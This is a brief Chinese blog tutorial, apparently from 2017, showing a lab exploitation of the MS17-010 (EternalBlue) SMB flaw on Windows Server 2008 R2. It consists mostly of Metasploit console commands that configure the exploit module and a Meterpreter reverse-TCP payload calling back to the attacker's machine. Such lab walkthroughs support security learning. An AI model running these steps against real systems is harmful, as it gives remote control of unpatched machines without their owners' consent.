使用metasploit(MSF)對windows的ms17-010漏洞進行利用的過程
2017-10-11 10:38:02 D-river 閱讀數 23523更多
分類專欄: windows
版權聲明:本文爲博主原創文章,遵循 CC 4.0 BY-SA 版權協議,轉載請附上原文出處鏈接和本聲明。
本文鏈接:https://blog.csdn.net/u013672940/article/details/78200950
0x01 實驗環境
攻擊機:kali linux
ip:10.10.10.131
目標機:windows 2008 R2
ip:10.10.10.132
0x02 配置exploit
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set rhost 10.10.10.132
rhost => 10.10.10.132
查看選項
msf exploit(ms17_010_eternalblue) > show options
設置目標機的IP,其他選項默認就可以;
注意:選項中說明了此exploit對應的目標系統,所以並不是具有該漏洞的系統都能利用此exploit;
0x03 配置payload
payload只需要配置監聽返回會話的IP;
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > set lhost 10.10.10.131
lhost => 10.10.10.131
0x04 開始攻擊
警告:攻擊過程可能導致目標系統宕機重啓,謹慎操作!
msf exploit(ms17_010_eternalblue) > exploit
成功獲得session。